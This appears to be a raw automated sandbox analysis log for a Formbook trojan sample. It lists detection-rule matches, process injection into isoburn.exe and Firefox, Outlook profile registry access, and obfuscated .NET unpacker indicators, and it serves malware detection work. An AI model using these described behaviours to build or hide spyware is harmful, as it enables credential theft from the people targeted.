            Source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: WrrCV4QR2J.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, uZsT5V3p7CYwSeRgrW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, uZsT5V3p7CYwSeRgrW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/15
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WrrCV4QR2J.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\7e327r58Jump to behavior
            Source: WrrCV4QR2J.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: WrrCV4QR2J.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: WrrCV4QR2J.exeReversingLabs: Detection: 73%
            Source: unknownProcess created: C:\Users\user\Desktop\WrrCV4QR2J.exe C:\Users\user\Desktop\WrrCV4QR2J.exe
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess created: C:\Users\user\Desktop\WrrCV4QR2J.exe C:\Users\user\Desktop\WrrCV4QR2J.exe
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeProcess created: C:\Users\user\Desktop\WrrCV4QR2J.exe C:\Users\user\Desktop\WrrCV4QR2J.exeJump to behavior
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: WrrCV4QR2J.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: WrrCV4QR2J.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UHPrrMeffyCaz.exe, 00000003.00000002.4120453242.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1845745734.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: WrrCV4QR2J.exe, WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: WrrCV4QR2J.exe, Token_Toolbar.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.cs.Net Code: jyoK6eXlCS System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.2ea469c.3.raw.unpack, -Module-.cs.Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.2ea469c.3.raw.unpack, wA.cs.Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.5ac0000.6.raw.unpack, -Module-.cs.Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.5ac0000.6.raw.unpack, wA.cs.Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.cs.Net Code: jyoK6eXlCS System.Reflection.Assembly.Load(byte[])
            Source: 4.2.isoburn.exe.4cc3814.2.raw.unpack, Token_Toolbar.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 6.2.UHPrrMeffyCaz.exe.2753814.1.raw.unpack, Token_Toolbar.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DB3AD7 push ebx; retf 0_2_02DB3ADA
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_02DBC845 push FFFFFF8Bh; iretd 0_2_02DBC847
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_054F8D6A push esp; retf 0_2_054F8D71
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_054F8B5A pushad ; retf 0_2_054F8D69
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 0_2_054F7FD0 pushad ; ret 0_2_054F7FD1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0042B882 push eax; ret 2_2_0042B884
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00401887 push ebp; retf 2_2_00401889
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040509B push FFFFFFF5h; ret 2_2_0040509F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040D1DC pushad ; retf 2_2_0040D1E9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004049AE push ebp; retf 2_2_004049B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00401A15 push esp; retf 2_2_00401A2F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_004032D0 push eax; ret 2_2_004032D2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00413AD2 push ebp; retf 2_2_00413AD5
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00401AF6 push ebp; iretd 2_2_00401AFA
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00407C3E push ecx; ret 2_2_00407C51
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040CD3A push edx; ret 2_2_0040CD3B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00404DF4 push ebp; retf 2_2_00404DF8
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00429603 push edi; ret 2_2_0042960C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0041AE3A push ebp; retf 2_2_0041AE3B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040175B push ebp; retf 2_2_00401774
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015709AD push ecx; mov dword ptr [esp], ecx2_2_015709B6
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_05010F59 push edx; ret 3_2_05010F5A
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0500BE5D push ecx; ret 3_2_0500BE70
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0502A167 push ebx; retf 3_2_0502A168
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_05009013 push ebp; retf 3_2_05009017
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0502D81E push edi; ret 3_2_0502D82B
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0502D822 push edi; ret 3_2_0502D82B
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_05029865 pushad ; retf 3_2_05029868
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_0502A099 push cs; retf 3_2_0502A0A3
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_05008BCD push ebp; retf 3_2_05008BCF
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeCode function: 3_2_050113FB pushad ; retf 3_2_05011408
            Source: initial sampleStatic PE information: section name: .text entropy: 7.765104825647267
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, uZsT5V3p7CYwSeRgrW.csHigh entropy of concatenated method names: 'UrEkVrepPu', 'hCokTotoli', 'EntkSXy8FU', 'Cftkgs0Msi', 'SoPkuyxMAX', 'f0akHvnqGL', 'HGNkF3N0MO', 'uiBkmA56vc', 'l3WkDDxIbE', 'gDSkfGO8vP'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, vJvTF9KnSxFhHg9rBx.csHigh entropy of concatenated method names: 'RCMqOZsT5V', 'P7CqYYwSeR', 'kkQqeb4pO4', 'KxRqNLxP5N', 'pX2qsbww4y', 'zKKqJVo3yI', 'i7aiMqtV6h38sjYM5N', 'UmgqiphQJZkwQgRmRh', 'EeTqqwQy9B', 'ORSqAusJEF'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, CjNX4FSnioVjqLZ3xh.csHigh entropy of concatenated method names: 'ToString', 'UELJ4bvwjS', 'CLyJdqHmiX', 'CKBJjlZGuY', 'bdcJQe92MZ', 'AODJ8GCgho', 'uEUJEQKLGF', 'L2lJL8GX7D', 'spgJxAC9DW', 'c3yJil9k6u'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, V66FEgql8oeukKBV1lM.csHigh entropy of concatenated method names: 'd2xCoVxhaD', 'q0TCbe9yqy', 'x4yC6CtBMe', 'GhBCvpSWYm', 'B3uC2C6p32', 'svTCaqtmlS', 'u06Cy899LN', 'ixsC3RVVeN', 'LvECroTUGC', 'uuBCZ6F6ro'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, iQx60RHa0qKYPf3Z8O.csHigh entropy of concatenated method names: 'fQstmI0fBW', 'e7ItfYhtqw', 'vDWIl5lcJa', 'cruIqw4PPM', 'omYt4MJYrH', 'j0ltpT7VVt', 'gpftR6aOlM', 'dwNtV6sMBh', 'poJtTO3qa3', 'hH9tSp4uZw'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, S3Mfu2L0P6ZYqF8JDx.csHigh entropy of concatenated method names: 'f3eOcvDc0B', 'gRuOBOtO0n', 'zABOhBbqok', 'IvRhfy9Rn7', 'n3DhzWmxMs', 'MONOlb1beT', 'cyWOqCdHxl', 'iwSO5sC9KA', 'yIYOAjyLiC', 'slNOKS7cW3'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, MP5NrvZQ26MmltX2bw.csHigh entropy of concatenated method names: 'cZOW2y4bYO', 'kGdWy9JsmQ', 'CIZBjPdnAg', 'kkVBQL3nEc', 'QRwB8DfX4t', 'J44BEFc2Rd', 'AXsBL6tjme', 'ERJBxYetUK', 'eA3BiApgAF', 'AReBP3fwKB'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, RbqhOUqA7QhOoEjcRkO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iuv0VtqOnh', 'slX0TU0wwn', 'ljB0SECqEo', 'EUp0gcUbrd', 'Yv00uNUrf3', 'DVp0Hq96Dl', 'wit0Fvtxjj'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, GJEHX3fv9BeMEunr8v.csHigh entropy of concatenated method names: 'uH6Cq5ow9h', 'TEFCA6iDCo', 'Ho3CK0HqK5', 'ckQCcBhfXv', 'UpyCkOu31i', 'hfrCWCVBZP', 'f2fCh8ICet', 'V1CIFOGWFO', 'TKBImRwVPK', 'K6AIDd9U5v'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, GCdZAjBqwOnwwqiAmv.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Vca5D9x1sc', 'w2j5fLRVGS', 'Yn35zSjEY4', 'ExHAlrhjl1', 'C1gAqIxplb', 'SZpA5HHY1Q', 'JJOAAR5hKc', 'g0vgFCBxJcCTMOyTqyX'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.csHigh entropy of concatenated method names: 'FauAXwqwxA', 'QwtAcMfrVd', 'UB9Ak3cwLX', 'xkOABy0YT0', 'VUXAWTCGs3', 'xlQAhgtp3n', 'dwLAO4ufc4', 'uSJAYNRDBM', 'orpAn8xTK0', 'pdvAeXKVOu'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, QgjsJYrkQb4pO4ExRL.csHigh entropy of concatenated method names: 'ORuBvVxDjh', 'a5WBaqqp3e', 'B1DB3jPqN8', 'kDqBrRgQP1', 'OI2BssjTpr', 'QvsBJc4EsI', 'skgBtC7dh7', 'hUIBI9q64d', 'JVABCJUtNk', 'C4IB0PeOm9'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, tm1DnHztQw0jTPAyiw.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nSHCwMCQey', 'SydCsj6yxM', 'bs5CJDx4YK', 'ocSCtqNPNn', 'PKgCIAttT0', 'NSvCCWHSuI', 'SkVC02tA1p'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, n4y6KK7Vo3yIB06LCb.csHigh entropy of concatenated method names: 'XNuhXpmUl6', 'zMUhkIABI0', 'zj2hW6gZZX', 'R6uhO6sfv6', 'yjThY6FFc4', 'aUFWuDPPVQ', 'k5eWHWmUZ1', 'Bu5WFZQ7CU', 'gKpWmOu8G7', 'yrAWDvq7dT'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, CQsihPRp2QqDfJ2WSG.csHigh entropy of concatenated method names: 'BNsw3YVVaS', 'F65wrrRnDL', 'wDZw7WcFdk', 'PppwdAGxJE', 'qVkwQGeYgn', 'PyMw801swy', 'Ue6wLESeqI', 'Ykowx05OXQ', 'rgrwPOoZTP', 'q4iw47g68E'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, GnP3Iym1crZI6i4xA4.csHigh entropy of concatenated method names: 'dRwIcDbpt2', 'oavIkQ41Yn', 'pvFIBfAW3l', 'ca6IWVxWLP', 'ew8IhUo8th', 'oYFIOwoX4r', 'ERWIYGybIC', 'QpTInfRjBE', 'WueIe3gfNd', 'w2RIN7xlYa'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, RSWgxp5kdrRP34y6Vl.csHigh entropy of concatenated method names: 'K1q6bqlRG', 'YuXvfvPVN', 'cFraLwpgk', 'iFuyNTKIj', 'tbpreUUth', 'elrZw0Qkt', 'V1xbuhksBZHS3doqyW', 'YKtbkNfeVsmjDISpgJ', 'YciI2bsM9', 'HD10x6K3T'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, ADARcmkG3iF4hU5dFs.csHigh entropy of concatenated method names: 'Dispose', 'oANqDsOhFo', 'oF35dJLQt0', 'k1Booq37m8', 'D7nqfP3Iy1', 'frZqzI6i4x', 'ProcessDialogKey', 'c485lXwPDC', 'qDf5qJFfBe', 'MD9557JEHX'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, iCCk6PiX0UnT0YF2Ph.csHigh entropy of concatenated method names: 'O1UOo4utxI', 'xaHObRiZI6', 's05O6k2Er2', 'mchOvlNdJN', 'p1DO26fxXO', 'lUmOaHss6D', 'o6HOydgXJC', 'fhEO3iDWQr', 'ni7OrXPfhb', 'jGlOZiCo4j'
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, HtYtbfVAJQd3LvHq3J.csHigh entropy of concatenated method names: 'oTxsPJXxpQ', 'lGZsp8YUpw', 'SaysV8sjwa', 'W24sTCoCtf', 'jaXsdTxQHi', 'fo6sjH7TIW', 'cNusQS9vEP', 'mnGs8iwwYy', 'T4GsEOsC5W', 'tgUsLDfi5g'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, uZsT5V3p7CYwSeRgrW.csHigh entropy of concatenated method names: 'UrEkVrepPu', 'hCokTotoli', 'EntkSXy8FU', 'Cftkgs0Msi', 'SoPkuyxMAX', 'f0akHvnqGL', 'HGNkF3N0MO', 'uiBkmA56vc', 'l3WkDDxIbE', 'gDSkfGO8vP'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, vJvTF9KnSxFhHg9rBx.csHigh entropy of concatenated method names: 'RCMqOZsT5V', 'P7CqYYwSeR', 'kkQqeb4pO4', 'KxRqNLxP5N', 'pX2qsbww4y', 'zKKqJVo3yI', 'i7aiMqtV6h38sjYM5N', 'UmgqiphQJZkwQgRmRh', 'EeTqqwQy9B', 'ORSqAusJEF'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, CjNX4FSnioVjqLZ3xh.csHigh entropy of concatenated method names: 'ToString', 'UELJ4bvwjS', 'CLyJdqHmiX', 'CKBJjlZGuY', 'bdcJQe92MZ', 'AODJ8GCgho', 'uEUJEQKLGF', 'L2lJL8GX7D', 'spgJxAC9DW', 'c3yJil9k6u'
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, V66FEgql8oeukKBV1lM.csHigh entropy of concatenated method names: 'd2xCoVxhaD', 'q0TCbe9yqy', 'x4yC6CtBMe', 'GhBCvpSWYm', 'B3uC2C6p32', 'svTCaqtmlS', 'u06Cy899LN', 'ixsC3RVVeN', 'LvECroTUGC', 'uuBCZ6F6ro'
